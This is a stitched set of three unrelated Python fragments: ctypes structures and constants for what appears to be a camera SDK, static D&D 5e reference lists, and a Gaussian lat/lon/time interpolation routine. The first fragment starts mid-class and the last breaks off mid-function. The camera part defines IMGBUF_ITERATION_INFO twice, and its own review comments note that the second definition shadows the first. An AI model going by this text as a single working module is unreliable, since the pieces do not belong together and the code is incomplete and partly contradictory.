    _fields_ = [("s32X", wt.INT),
                ("s32Y", wt.INT)]
class IS_SIZE_2D(ctypes.Structure):
    """2D size (width/height) with signed 32-bit integer components.

    :var INT s32Width:
    :var INT s32Height:
    """
    _fields_ = [("s32Width", wt.INT),
                ("s32Height", wt.INT)]
class IS_RECT(ctypes.Structure):
    """Rectangle given by its origin (s32X, s32Y) and its width/height,
    all as signed 32-bit integers.

    :var INT s32X:
    :var INT s32Y:
    :var INT s32Width:
    :var INT s32Height:
    """
    _fields_ = [("s32X", wt.INT),
                ("s32Y", wt.INT),
                ("s32Width", wt.INT),
                ("s32Height", wt.INT)]
class AOI_SEQUENCE_PARAMS(ctypes.Structure):
    """Per-AOI parameters for an AOI sequence: index, repetitions, position,
    exposure, gain, binning/subsampling and scaler settings.

    :var INT s32AOIIndex:
    :var INT s32NumberOfCycleRepetitions:
    :var INT s32X:
    :var INT s32Y:
    :var ctypes.c_double dblExposure:
    :var INT s32Gain:
    :var INT s32BinningMode:
    :var INT s32SubsamplingMode:
    :var INT s32DetachImageParameters:
    :var ctypes.c_double dblScalerFactor:
    :var BYTE[64] byReserved:
    """
    _fields_ = [("s32AOIIndex", wt.INT),
                ("s32NumberOfCycleRepetitions", wt.INT),
                ("s32X", wt.INT),
                ("s32Y", wt.INT),
                ("dblExposure", ctypes.c_double),
                ("s32Gain", wt.INT),
                ("s32BinningMode", wt.INT),
                ("s32SubsamplingMode", wt.INT),
                ("s32DetachImageParameters", wt.INT),
                ("dblScalerFactor", ctypes.c_double),
                ("byReserved", wt.BYTE * 64)]
IS_DEVICE_FEATURE_CMD_GET_SUPPORTED_FEATURES = 1
IS_DEVICE_FEATURE_CMD_SET_LINESCAN_MODE = 2
IS_DEVICE_FEATURE_CMD_GET_LINESCAN_MODE = 3
IS_DEVICE_FEATURE_CMD_SET_LINESCAN_NUMBER = 4
IS_DEVICE_FEATURE_CMD_GET_LINESCAN_NUMBER = 5
IS_DEVICE_FEATURE_CMD_SET_SHUTTER_MODE = 6
IS_DEVICE_FEATURE_CMD_GET_SHUTTER_MODE = 7
IS_DEVICE_FEATURE_CMD_SET_PREFER_XS_HS_MODE = 8
IS_DEVICE_FEATURE_CMD_GET_PREFER_XS_HS_MODE = 9
IS_DEVICE_FEATURE_CMD_GET_DEFAULT_PREFER_XS_HS_MODE = 10
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_DEFAULT = 11
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE = 12
IS_DEVICE_FEATURE_CMD_SET_LOG_MODE = 13
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_VALUE_DEFAULT = 14
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_VALUE_RANGE = 15
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_VALUE = 16
IS_DEVICE_FEATURE_CMD_SET_LOG_MODE_MANUAL_VALUE = 17
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_GAIN_DEFAULT = 18
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_GAIN_RANGE = 19
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_GAIN = 20
IS_DEVICE_FEATURE_CMD_SET_LOG_MODE_MANUAL_GAIN = 21
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_ROLLING = 0x00000001
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_GLOBAL = 0x00000002
IS_DEVICE_FEATURE_CAP_LINESCAN_MODE_FAST = 0x00000004
IS_DEVICE_FEATURE_CAP_LINESCAN_NUMBER = 0x00000008
IS_DEVICE_FEATURE_CAP_PREFER_XS_HS_MODE = 0x00000010
IS_DEVICE_FEATURE_CAP_LOG_MODE = 0x00000020
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_ROLLING_GLOBAL_START = 0x00000040
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_GLOBAL_ALTERNATIVE_TIMING = 0x00000080
IS_LOG_MODE_FACTORY_DEFAULT = 0
IS_LOG_MODE_OFF = 1
IS_LOG_MODE_MANUAL = 2
class RANGE_OF_VALUES_U32(ctypes.Structure):
    """Range descriptor for an unsigned 32-bit parameter:
    minimum, maximum, increment, default, and an 'infinite' flag.

    :var UINT u32Minimum:
    :var UINT u32Maximum:
    :var UINT u32Increment:
    :var UINT u32Default:
    :var UINT u32Infinite:
    """
    _fields_ = [("u32Minimum", wt.UINT),
                ("u32Maximum", wt.UINT),
                ("u32Increment", wt.UINT),
                ("u32Default", wt.UINT),
                ("u32Infinite", wt.UINT)]
TRANSFER_CAP_IMAGEDELAY = 0x01
TRANSFER_CAP_PACKETINTERVAL = 0x20
TRANSFER_CMD_QUERY_CAPABILITIES = 0
TRANSFER_CMD_SET_IMAGEDELAY_US = 1000
TRANSFER_CMD_SET_PACKETINTERVAL_US = 1005
TRANSFER_CMD_GET_IMAGEDELAY_US = 2000
TRANSFER_CMD_GET_PACKETINTERVAL_US = 2005
TRANSFER_CMD_GETRANGE_IMAGEDELAY_US = 3000
TRANSFER_CMD_GETRANGE_PACKETINTERVAL_US = 3005
TRANSFER_CMD_SET_IMAGE_DESTINATION = 5000
TRANSFER_CMD_GET_IMAGE_DESTINATION = 5001
TRANSFER_CMD_GET_IMAGE_DESTINATION_CAPABILITIES = 5002
IS_TRANSFER_DESTINATION_DEVICE_MEMORY = 1
IS_TRANSFER_DESTINATION_USER_MEMORY = 2
IS_BOOTBOOST_ID = wt.BYTE
IS_BOOTBOOST_ID_MIN = 1
IS_BOOTBOOST_ID_MAX = 254
IS_BOOTBOOST_ID_NONE = 0
IS_BOOTBOOST_ID_ALL = 255
# class IS_BOOTBOOST_IDLIST(ctypes.Structure):
# _fields_ = [("u32NumberOfEntries", wt.DWORD),
# ("aList", ctypes.POINTER(IS_BOOTBOOST_ID))]
def create_bootboost_idlist(numberOfEntries):
    """Return an IS_BOOTBOOST_IDLIST instance whose *aList* array is scaled to size.

    :param ULONG numberOfEntries: Number of aList entries requested.
    :returns: IS_BOOTBOOST_IDLIST
    :var DWORD u32NumberOfEntries:
    :var IS_BOOTBOOST_ID[numberOfEntries] aList:
    """
    # The array length is part of the ctypes type, so the structure class
    # has to be created per call.
    class IS_BOOTBOOST_IDLIST(ctypes.Structure):
        _fields_ = [("u32NumberOfEntries", wt.DWORD),
                    ("aList", IS_BOOTBOOST_ID * numberOfEntries)]
    id_list = IS_BOOTBOOST_IDLIST()
    id_list.u32NumberOfEntries = numberOfEntries
    return id_list
IS_BOOTBOOST_IDLIST_HEADERSIZE = (ctypes.sizeof(wt.DWORD))
IS_BOOTBOOST_IDLIST_ELEMENTSIZE = (ctypes.sizeof(IS_BOOTBOOST_ID))
IS_BOOTBOOST_CMD_ENABLE = 0x00010001
IS_BOOTBOOST_CMD_DISABLE = 0x00010011
IS_BOOTBOOST_CMD_GET_ENABLED = 0x20010021
IS_BOOTBOOST_CMD_ADD_ID = 0x10100001
IS_BOOTBOOST_CMD_SET_IDLIST = 0x10100005
IS_BOOTBOOST_CMD_REMOVE_ID = 0x10100011
IS_BOOTBOOST_CMD_CLEAR_IDLIST = 0x00100015
IS_BOOTBOOST_CMD_GET_IDLIST = 0x30100021
IS_BOOTBOOST_CMD_GET_IDLIST_SIZE = 0x20100022
IPCONFIG_CAP_PERSISTENT_IP_SUPPORTED = 0x01
IPCONFIG_CAP_AUTOCONFIG_IP_SUPPORTED = 0x04
IPCONFIG_CMD_QUERY_CAPABILITIES = 0
IPCONFIG_CMD_SET_PERSISTENT_IP = 0x01010000
IPCONFIG_CMD_SET_AUTOCONFIG_IP = 0x01040000
IPCONFIG_CMD_SET_AUTOCONFIG_IP_BYDEVICE = 0x01040100
IPCONFIG_CMD_GET_PERSISTENT_IP = 0x02010000
IPCONFIG_CMD_GET_AUTOCONFIG_IP = 0x02040000
IPCONFIG_CMD_GET_AUTOCONFIG_IP_BYDEVICE = 0x02040100
IS_CONFIG_CPU_IDLE_STATES_BIT_AC_VALUE = 0x01 # !< Mains power
IS_CONFIG_CPU_IDLE_STATES_BIT_DC_VALUE = 0x02 # !< Battery power
IS_CONFIG_OPEN_MP_DISABLE = 0
IS_CONFIG_OPEN_MP_ENABLE = 1
IS_CONFIG_INITIAL_PARAMETERSET_NONE = 0
IS_CONFIG_INITIAL_PARAMETERSET_1 = 1
IS_CONFIG_INITIAL_PARAMETERSET_2 = 2
IS_CONFIG_CMD_GET_CAPABILITIES = 1 # !< Get supported configuration capabilities (bitmask of CONFIGURATION_CAPS)
IS_CONFIG_CPU_IDLE_STATES_CMD_GET_ENABLE = 2 # !< Get the current CPU idle states enable state (bitmask of CONFIGURATION_SEL)
IS_CONFIG_CPU_IDLE_STATES_CMD_SET_DISABLE_ON_OPEN = 4 # !< Disable migration to other CPU idle states (other than C0) if the first USB camera is being opened
IS_CONFIG_CPU_IDLE_STATES_CMD_GET_DISABLE_ON_OPEN = 5 # !< Get the current setting of the command IS_CPU_IDLE_STATES_CMD_SET_DISABLE_ON_OPEN
IS_CONFIG_OPEN_MP_CMD_GET_ENABLE = 6
IS_CONFIG_OPEN_MP_CMD_SET_ENABLE = 7
IS_CONFIG_OPEN_MP_CMD_GET_ENABLE_DEFAULT = 8
IS_CONFIG_INITIAL_PARAMETERSET_CMD_SET = 9
IS_CONFIG_INITIAL_PARAMETERSET_CMD_GET = 10
IS_CONFIG_CPU_IDLE_STATES_CAP_SUPPORTED = 0x00000001 # !< CPU idle state commands are supported by the SDK
IS_CONFIG_OPEN_MP_CAP_SUPPORTED = 0x00000002 # !< Open MP commands are supported by the SDK
IS_CONFIG_INITIAL_PARAMETERSET_CAP_SUPPORTED = 0x00000004 # !< Initial parameter set commands are supported by the SDK
IS_EXPOSURE_CMD_GET_CAPS = 1
IS_EXPOSURE_CMD_GET_EXPOSURE_DEFAULT = 2
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE_MIN = 3
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE_MAX = 4
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE_INC = 5
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE = 6
IS_EXPOSURE_CMD_GET_EXPOSURE = 7
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE_MIN = 8
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE_MAX = 9
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE_INC = 10
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE = 11
IS_EXPOSURE_CMD_SET_EXPOSURE = 12
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE_MIN = 13
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE_MAX = 14
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE_INC = 15
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE = 16
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_ENABLE = 17
IS_EXPOSURE_CMD_SET_LONG_EXPOSURE_ENABLE = 18
IS_EXPOSURE_CMD_GET_DUAL_EXPOSURE_RATIO = 19
IS_EXPOSURE_CMD_SET_DUAL_EXPOSURE_RATIO = 20
IS_EXPOSURE_CAP_EXPOSURE = 0x00000001
IS_EXPOSURE_CAP_FINE_INCREMENT = 0x00000002
IS_EXPOSURE_CAP_LONG_EXPOSURE = 0x00000004
IS_EXPOSURE_CAP_DUAL_EXPOSURE = 0x00000008
IS_TRIGGER_CMD_GET_BURST_SIZE_SUPPORTED = 1
IS_TRIGGER_CMD_GET_BURST_SIZE_RANGE = 2
IS_TRIGGER_CMD_GET_BURST_SIZE = 3
IS_TRIGGER_CMD_SET_BURST_SIZE = 4
class IO_FLASH_PARAMS(ctypes.Structure):
    """Flash timing: signed delay and unsigned duration.
    (Units are not shown here -- presumably microseconds; confirm against the SDK.)

    :var INT s32Delay:
    :var UINT u32Duration:
    """
    _fields_ = [("s32Delay", wt.INT),
                ("u32Duration", wt.UINT)]
class IO_PWM_PARAMS(ctypes.Structure):
    """PWM output parameters: frequency in Hz and duty cycle.

    :var ctypes.c_double dblFrequency_Hz:
    :var ctypes.c_double dblDutyCycle:
    """
    _fields_ = [("dblFrequency_Hz", ctypes.c_double),
                ("dblDutyCycle", ctypes.c_double)]
class IO_GPIO_CONFIGURATION(ctypes.Structure):
    """Configuration of a single GPIO: which pin, its capabilities,
    the selected configuration, and its current state.

    :var UINT u32Gpio:
    :var UINT u32Caps:
    :var UINT u32Configuration:
    :var UINT u32State:
    :var UINT[12] u32Reserved:
    """
    _fields_ = [("u32Gpio", wt.UINT),
                ("u32Caps", wt.UINT),
                ("u32Configuration", wt.UINT),
                ("u32State", wt.UINT),
                ("u32Reserved", wt.UINT * 12)]
IO_LED_STATE_1 = 0
IO_LED_STATE_2 = 1
IO_FLASH_MODE_OFF = 0
IO_FLASH_MODE_TRIGGER_LO_ACTIVE = 1
IO_FLASH_MODE_TRIGGER_HI_ACTIVE = 2
IO_FLASH_MODE_CONSTANT_HIGH = 3
IO_FLASH_MODE_CONSTANT_LOW = 4
IO_FLASH_MODE_FREERUN_LO_ACTIVE = 5
IO_FLASH_MODE_FREERUN_HI_ACTIVE = 6
IS_FLASH_MODE_PWM = 0x8000
IO_FLASH_MODE_GPIO_1 = 0x0010
IO_FLASH_MODE_GPIO_2 = 0x0020
IO_FLASH_MODE_GPIO_3 = 0x0040
IO_FLASH_MODE_GPIO_4 = 0x0080
IO_FLASH_GPIO_PORT_MASK = (IO_FLASH_MODE_GPIO_1 | IO_FLASH_MODE_GPIO_2 | IO_FLASH_MODE_GPIO_3 | IO_FLASH_MODE_GPIO_4)
IO_GPIO_1 = 0x0001
IO_GPIO_2 = 0x0002
IO_GPIO_3 = 0x0004
IO_GPIO_4 = 0x0008
IS_GPIO_INPUT = 0x0001
IS_GPIO_OUTPUT = 0x0002
IS_GPIO_FLASH = 0x0004
IS_GPIO_PWM = 0x0008
IS_GPIO_COMPORT_RX = 0x0010
IS_GPIO_COMPORT_TX = 0x0020
IS_IO_CMD_GPIOS_GET_SUPPORTED = 1
IS_IO_CMD_GPIOS_GET_SUPPORTED_INPUTS = 2
IS_IO_CMD_GPIOS_GET_SUPPORTED_OUTPUTS = 3
IS_IO_CMD_GPIOS_GET_DIRECTION = 4
IS_IO_CMD_GPIOS_SET_DIRECTION = 5
IS_IO_CMD_GPIOS_GET_STATE = 6
IS_IO_CMD_GPIOS_SET_STATE = 7
IS_IO_CMD_LED_GET_STATE = 8
IS_IO_CMD_LED_SET_STATE = 9
IS_IO_CMD_LED_TOGGLE_STATE = 10
IS_IO_CMD_FLASH_GET_GLOBAL_PARAMS = 11
IS_IO_CMD_FLASH_APPLY_GLOBAL_PARAMS = 12
IS_IO_CMD_FLASH_GET_SUPPORTED_GPIOS = 13
IS_IO_CMD_FLASH_GET_PARAMS_MIN = 14
IS_IO_CMD_FLASH_GET_PARAMS_MAX = 15
IS_IO_CMD_FLASH_GET_PARAMS_INC = 16
IS_IO_CMD_FLASH_GET_PARAMS = 17
IS_IO_CMD_FLASH_SET_PARAMS = 18
IS_IO_CMD_FLASH_GET_MODE = 19
IS_IO_CMD_FLASH_SET_MODE = 20
IS_IO_CMD_PWM_GET_SUPPORTED_GPIOS = 21
IS_IO_CMD_PWM_GET_PARAMS_MIN = 22
IS_IO_CMD_PWM_GET_PARAMS_MAX = 23
IS_IO_CMD_PWM_GET_PARAMS_INC = 24
IS_IO_CMD_PWM_GET_PARAMS = 25
IS_IO_CMD_PWM_SET_PARAMS = 26
IS_IO_CMD_PWM_GET_MODE = 27
IS_IO_CMD_PWM_SET_MODE = 28
IS_IO_CMD_GPIOS_GET_CONFIGURATION = 29
IS_IO_CMD_GPIOS_SET_CONFIGURATION = 30
IS_IO_CMD_FLASH_GET_GPIO_PARAMS_MIN = 31
IS_IO_CMD_FLASH_SET_GPIO_PARAMS = 32
IS_AWB_CMD_GET_SUPPORTED_TYPES = 1
IS_AWB_CMD_GET_TYPE = 2
IS_AWB_CMD_SET_TYPE = 3
IS_AWB_CMD_GET_ENABLE = 4
IS_AWB_CMD_SET_ENABLE = 5
IS_AWB_CMD_GET_SUPPORTED_RGB_COLOR_MODELS = 6
IS_AWB_CMD_GET_RGB_COLOR_MODEL = 7
IS_AWB_CMD_SET_RGB_COLOR_MODEL = 8
IS_AWB_GREYWORLD = 0x0001
IS_AWB_COLOR_TEMPERATURE = 0x0002
IS_AUTOPARAMETER_DISABLE = 0
IS_AUTOPARAMETER_ENABLE = 1
IS_AUTOPARAMETER_ENABLE_RUNONCE = 2
class BUFFER_CONVERSION_PARAMS(ctypes.Structure):
    """Source/destination buffers and destination processing settings
    (pixel format, converter, gamma, edge enhancement, color correction,
    saturation) for a buffer conversion.

    :var ctypes.c_char_p pSourceBuffer:
    :var ctypes.c_char_p pDestBuffer:
    :var INT nDestPixelFormat:
    :var INT nDestPixelConverter:
    :var INT nDestGamma:
    :var INT nDestEdgeEnhancement:
    :var INT nDestColorCorrectionMode:
    :var INT nDestSaturationU:
    :var INT nDestSaturationV:
    :var BYTE[32] reserved:
    """
    _fields_ = [("pSourceBuffer", ctypes.c_char_p),
                ("pDestBuffer", ctypes.c_char_p),
                ("nDestPixelFormat", wt.INT),
                ("nDestPixelConverter", wt.INT),
                ("nDestGamma", wt.INT),
                ("nDestEdgeEnhancement", wt.INT),
                ("nDestColorCorrectionMode", wt.INT),
                ("nDestSaturationU", wt.INT),
                ("nDestSaturationV", wt.INT),
                ("reserved", wt.BYTE * 32)]
IS_CONVERT_CMD_APPLY_PARAMS_AND_CONVERT_BUFFER = 1
IS_PARAMETERSET_CMD_LOAD_EEPROM = 1
IS_PARAMETERSET_CMD_LOAD_FILE = 2
IS_PARAMETERSET_CMD_SAVE_EEPROM = 3
IS_PARAMETERSET_CMD_SAVE_FILE = 4
IS_PARAMETERSET_CMD_GET_NUMBER_SUPPORTED = 5
IS_EDGE_ENHANCEMENT_CMD_GET_RANGE = 1
IS_EDGE_ENHANCEMENT_CMD_GET_DEFAULT = 2
IS_EDGE_ENHANCEMENT_CMD_GET = 3
IS_EDGE_ENHANCEMENT_CMD_SET = 4
IS_PIXELCLOCK_CMD_GET_NUMBER = 1
IS_PIXELCLOCK_CMD_GET_LIST = 2
IS_PIXELCLOCK_CMD_GET_RANGE = 3
IS_PIXELCLOCK_CMD_GET_DEFAULT = 4
IS_PIXELCLOCK_CMD_GET = 5
IS_PIXELCLOCK_CMD_SET = 6
class IMAGE_FILE_PARAMS(ctypes.Structure):
    """Parameters for image file load/save: wide-char file name, file type,
    quality, and pointers to the image memory and its ID.

    :var ctypes.c_wchar_p pwchFileName:
    :var UINT nFileType:
    :var UINT nQuality:
    :var ctypes.POINTER(ctypes.c_char_p) ppcImageMem:
    :var ctypes.POINTER(wt.UINT) pnImageID:
    :var BYTE[32] reserved:
    """
    _fields_ = [("pwchFileName", ctypes.c_wchar_p),
                ("nFileType", wt.UINT),
                ("nQuality", wt.UINT),
                ("ppcImageMem", ctypes.POINTER(ctypes.c_char_p)),
                ("pnImageID", ctypes.POINTER(wt.UINT)),
                ("reserved", wt.BYTE * 32)]
IS_IMAGE_FILE_CMD_LOAD = 1
IS_IMAGE_FILE_CMD_SAVE = 2
class IS_RANGE_S32(ctypes.Structure):
    """Signed 32-bit value range: minimum, maximum, and increment.

    :var INT s32Min:
    :var INT s32Max:
    :var INT s32Inc:
    """
    _fields_ = [("s32Min", wt.INT),
                ("s32Max", wt.INT),
                ("s32Inc", wt.INT)]
IS_AUTO_BLACKLEVEL_OFF = 0
IS_AUTO_BLACKLEVEL_ON = 1
IS_BLACKLEVEL_CAP_SET_AUTO_BLACKLEVEL = 1
IS_BLACKLEVEL_CAP_SET_OFFSET = 2
IS_BLACKLEVEL_CMD_GET_CAPS = 1
IS_BLACKLEVEL_CMD_GET_MODE_DEFAULT = 2
IS_BLACKLEVEL_CMD_GET_MODE = 3
IS_BLACKLEVEL_CMD_SET_MODE = 4
IS_BLACKLEVEL_CMD_GET_OFFSET_DEFAULT = 5
IS_BLACKLEVEL_CMD_GET_OFFSET_RANGE = 6
IS_BLACKLEVEL_CMD_GET_OFFSET = 7
IS_BLACKLEVEL_CMD_SET_OFFSET = 8
class MEASURE_SHARPNESS_AOI_INFO(ctypes.Structure):
    """Sharpness measurement for one AOI: the AOI number, the measured
    sharpness value, and the AOI rectangle.

    :var UINT u32NumberAOI:
    :var UINT u32SharpnessValue:
    :var IS_RECT rcAOI:
    """
    _fields_ = [("u32NumberAOI", wt.UINT),
                ("u32SharpnessValue", wt.UINT),
                ("rcAOI", IS_RECT)]
IS_MEASURE_CMD_SHARPNESS_AOI_SET = 1
IS_MEASURE_CMD_SHARPNESS_AOI_INQUIRE = 2
IS_MEASURE_CMD_SHARPNESS_AOI_SET_PRESET = 3
IS_MEASURE_SHARPNESS_AOI_PRESET_1 = 1
IS_IMGBUF_DEVMEM_CMD_GET_AVAILABLE_ITERATIONS = 1
IS_IMGBUF_DEVMEM_CMD_GET_ITERATION_INFO = 2
IS_IMGBUF_DEVMEM_CMD_TRANSFER_IMAGE = 3
IS_IMGBUF_DEVMEM_CMD_RELEASE_ITERATIONS = 4
class ID_RANGE(ctypes.Structure):
    """Range of IDs given by its first and last member.

    :var UINT u32First:
    :var UINT u32Last:
    """
    _fields_ = [("u32First", wt.UINT),
                ("u32Last", wt.UINT)]
class IMGBUF_ITERATION_INFO(ctypes.Structure):
    """Iteration info for the device-memory image buffer: iteration ID plus
    the range of image IDs it covers.

    NOTE(review): this class is immediately shadowed by a second class of the
    same name defined right below it, so this three-field layout is never the
    one importers see.  Confirm which layout the SDK expects and remove one.

    :var UINT u32IterationID:
    :var ID_RANGE rangeImageID:
    :var BYTE[52] bReserved:
    """
    _fields_ = [("u32IterationID", wt.UINT),
                ("rangeImageID", ID_RANGE),
                ("bReserved", wt.BYTE * 52)]
class IMGBUF_ITERATION_INFO(ctypes.Structure):
    """Iteration info for the device-memory image buffer: iteration ID and a
    single image ID.

    NOTE(review): this redefines (and therefore shadows) the class of the same
    name declared immediately above with a different, larger layout.  Confirm
    which layout the SDK expects and remove the other.

    :var UINT u32IterationID:
    :var UINT u32ImageID:
    """
    _fields_ = [("u32IterationID", wt.UINT),
                ("u32ImageID", wt.UINT)]
|
from pprint import pprint
# ---------------------------------------------------------------------------
# Static D&D 5e-style reference data (races, classes, spell metadata, skills,
# magic items).  These are plain constant lists/dicts with no logic.
# ---------------------------------------------------------------------------
races = [
    "dwarf",
    "elf",
    "halfling",
    "human",
    "dragonborn",
    "gnome",
    "half-elf",
    "half-orc",
    "tiefling"
]
classes = [
    "artificer",
    "barbarian",
    "bard",
    "cleric",
    "druid",
    "fighter",
    "monk",
    "paladin",
    "ranger",
    "rogue",
    "sorcerer",
    "warlock",
    "wizard"
]
# Subset of classes that cast spells.
spell_classes = [
    "artificer",
    "bard",
    "cleric",
    "druid",
    "paladin",
    "ranger",
    "sorcerer",
    "warlock",
    "wizard"
]
spell_levels = [
    "cantrip",
    "1",
    "2",
    "3",
    "4",
    "5",
    "6",
    "7",
    "8",
    "9"
]
schools = [
    "abjuration",
    "conjuration",
    "divination",
    "evocation",
    "enchantment",
    "illusion",
    "necromancy",
    "transmutation"
]
casting_times = [
    "1 action",
    "1 bonus action",
    "1 reaction",
    "1 minute",
    "10 minutes",
    "1 hour",
    "8 hours",
    "12 hours",
    "24 hours"
]
durations = [
    "Instantaneous",
    "1 round",
    "6 rounds",
    "1 minute",
    "10 minutes",
    "1 hour",
    "2 hours",
    "6 hours",
    "8 hours",
    "24 hours",
    "1 day",
    "7 days",
    "10 days",
    "30 days",
    "Until dispelled",
    "Special"
]
ranges = [
    "Touch",
    "5 feet",
    "10 feet",
    "15 feet",
    "30 feet",
    "60 feet",
    "90 feet",
    "100 feet",
    "120 feet",
    "150 feet",
    "300 feet",
    "500 feet",
    "1 mile",
    "5 miles",
    "500 miles",
    "Sight",
    "Unlimited",
    "Special"
]
shapes = [
    "Line",
    "Cone",
    "Cube",
    "Sphere",
    "Hemisphere"
]
sources = [
    "Player's Handbook",
    "Elemental Evil",
    "Xanathar's Guide to Everything",
    "Lost Laboratory of Kwalish",
    "Explorer's Guide to Wildemount",
    "Tasha's Cauldron of Everything",
    "Homebrew"
]
# Full source-book title -> abbreviation.
source_acronyms = {
    "Player's Handbook": "PHB",
    "Dungeon Master's Guide": "DMG",
    "Elemental Evil": "EE",
    "Sword Coast Adventurer's Guide": "SCAG",
    "Xanathar's Guide to Everything": "XGtE",
    "Lost Laboratory of Kwalish": "LLoK",
    "Explorer's Guide to Wildemount": "EGtW",
    "Tasha's Cauldron of Everything": "TCoE",
    "Waterdeep: Dragon Heist": "WDH",
    "Homebrew": "Home"
}
ability_scores = [
    "Strength",
    "Dexterity",
    "Constitution",
    "Intelligence",
    "Wisdom",
    "Charisma"
]
# (skill name, governing ability score) pairs.
skills = [
    ("Acrobatics", "Dexterity"),
    ("Animal Handling", "Wisdom"),
    ("Arcana", "Intelligence"),
    ("Athletics", "Strength"),
    ("Deception", "Charisma"),
    ("History", "Intelligence"),
    ("Insight", "Wisdom"),
    ("Intimidation", "Charisma"),
    ("Investigation", "Intelligence"),
    ("Medicine", "Wisdom"),
    ("Nature", "Intelligence"),
    ("Perception", "Wisdom"),
    ("Performance", "Charisma"),
    ("Persuasion", "Charisma"),
    ("Religion", "Intelligence"),
    ("Sleight of Hand", "Dexterity"),
    ("Stealth", "Dexterity"),
    ("Survival", "Wisdom")
]
magic_item_types = [
    "Armor",
    "Potion",
    "Ring",
    "Rod",
    "Scroll",
    "Staff",
    "Wand",
    "Weapon",
    "Wondrous Item"
]
magic_item_rarities = [
    "Common",
    "Uncommon",
    "Rare",
    "Very Rare",
    "Legendary",
    "Artifact"
]
magic_item_sources = [
    "Dungeon Master's Guide",
    "Xanathar's Guide to Everything",
    "Tasha's Cauldron of Everything",
    "Waterdeep: Dragon Heist",
    "Homebrew"
]
|
#
# gaussInterp_slow routine -- Gaussian weighted smoothing in lat, lon, and time
#
# Based on <NAME>'s routines. Pure python implementation.
#
#
# Gaussian weighting = exp( vfactor * (((x - x0)/sx)^2 + ((y - y0)/sy)^2 + ((t - t0)/st)^2 ))
#
# where deltas are distances in lat, lon and time and sx, sy, st are one e-folding sigmas.
#
# Cutoffs for neighbors allowed in the interpolation are set by distance in lat/lon (see dlat/dlon);
# for time all epochs are included.
#
import sys
import numpy as np
from math import exp
from numba import jit, int32
VERBOSE = 0
def gaussInterp_slow(var,                  # bundle of input arrays: masked variable, coordinates
                     varNames,             # names in order: primary variable, then time, lat, lon (see indexing below)
                     outlat, outlon,       # output lat/lon coordinate vectors
                     wlat, wlon,           # window of lat/lon neighbors to gaussian weight, expressed in delta lat (degrees)
                     slat, slon, stime,    # sigma for gaussian downweighting with distance in lat, lon (deg), & time (days)
                     vfactor=-0.6931,      # factor in front of gaussian expression
                     missingValue=-9999.,  # value to mark missing values in interp result
                     verbose=VERBOSE,      # integer to set verbosity level (NOTE(review): accepted but never used below)
                     optimization='python'):  # mode of optimization (NOTE(review): accepted but never used below)
    '''Gaussian interpolate in lat, lon, and time to a different lat/lon grid, and over a time window to the center time.

    Bundle of arrays (var) contains a 3D masked variable and coordinate arrays for lat, lon, and time read from netcdf/hdf files.
    varNames must list the dict keys in the order: variable, time, lat, lon
    (time comes *second*, matching the indexing below).

    NOTE(review): np.ma.getmask returns the scalar np.ma.nomask when v has no
    masked entries; gaussInterp_ indexes the mask per element, so an unmasked
    input would fail -- confirm callers always pass an explicitly masked array.

    Returns the 2D interpolated variable (masked) and a status for failures.
    '''
    v = var[varNames[0]][:]
    vmask = np.ma.getmask(v)[:]
    vtime = var[varNames[1]][:]   # time coordinate
    lat = var[varNames[2]][:]     # latitude coordinate
    lon = var[varNames[3]][:]     # longitude coordinate
    vinterp, vweight, status = \
        gaussInterp_(v, vmask, vtime, lat, lon,
                     outlat, outlon, wlat, wlon, slat, slon, stime, vfactor, missingValue)
    # Cells that accumulated zero total weight had no contributing neighbors.
    vinterp = np.ma.masked_where(vweight == 0.0, vinterp)
    return (vinterp, vweight, status)
#@jit(nopython=False)
def gaussInterp_(var,      # variable & mask arrays with dimensions (time, lat, lon)
                 vmask,
                 vtime,    # coordinate vectors for inputs
                 lat,
                 lon,
                 outlat,   # coordinate vectors for grid to interpolate to
                 outlon,
                 wlat, wlon,         # window of lat/lon neighbors to gaussian weight, expressed in delta lat (degrees)
                 slat, slon, stime,  # sigma for gaussian downweighting with distance in lat, lon (deg), & time (days)
                 vfactor,            # factor in front of gaussian expression
                 missingValue):      # value to mark missing values in interp result
    '''Gaussian interpolate in lat, lon, and time to a different lat/lon grid,
    and over a time window to the center time.

    Returns the 2D interpolated variable, the weight array (zero where no
    unmasked neighbor contributed), and a status for failures (negative on
    error).  Callers mask the zero-weight cells (see gaussInterp_slow).

    Fixes vs. the previous revision:
    - Python-2-only syntax (`xrange`, `print >>sys.stderr`) replaced so the
      routine runs on Python 3.
    - `int(ntime/2 + 0.5)` relied on Python-2 floor division (it equals
      ntime // 2); written explicitly so Python-3 true division does not
      shift the center time for odd ntime.
    - Uses a local clamp helper instead of the module-level one.
    - Dead commented-out stencil code and VERBOSE-guarded debug prints removed
      (module VERBOSE is 0, so default output is unchanged).
    '''
    vinterp = np.zeros((outlat.shape[0], outlon.shape[0]), dtype=var.dtype)  # weighted sum, then mean
    vweight = np.zeros((outlat.shape[0], outlon.shape[0]), dtype=var.dtype)  # total gaussian weight per cell
    status = 0    # negative status indicates error
    ntime = vtime.shape[0]
    nlat = lat.shape[0]
    nlon = lon.shape[0]
    noutlat = outlat.shape[0]
    noutlon = outlon.shape[0]
